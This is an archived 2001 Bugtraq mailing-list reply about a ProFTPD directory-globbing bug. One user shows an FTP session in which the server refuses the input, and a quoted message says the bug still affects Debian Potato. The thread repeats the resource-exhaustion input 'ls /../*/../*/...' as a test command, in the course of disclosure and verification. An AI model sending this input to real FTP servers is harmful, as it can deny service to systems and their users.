[22338] in bugtraq
RE: Multiple-Vendor-FTP-Vuln. (old?)
daemon@ATHENA.MIT.EDU (Michael Bellears)
Mon Aug 20 19:05:11 2001
Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>
From: Michael Bellears <michael.bellears@staff.datafx.com.au>
To: "'Michael Faurot'" <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Date: Tue, 21 Aug 2001 08:43:54 +1000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
- ProFTPD Version 1.2.0pre10
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*: Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB

> -----Original Message-----
> From: Michael Faurot [mailto:mfaurot@atww.org]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraq@securityfocus.com
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
>
>
> Enrico Kern <IphantomI@web.de> wrote:
> : Hi,
>
> : I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> : many new Linux-Dist..
>
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
>
> --
> ------------------------------------------------------------------------------
> Michael | mfaurot | Give your child mental blocks for Christmas.
> Faurot | atww.org |
>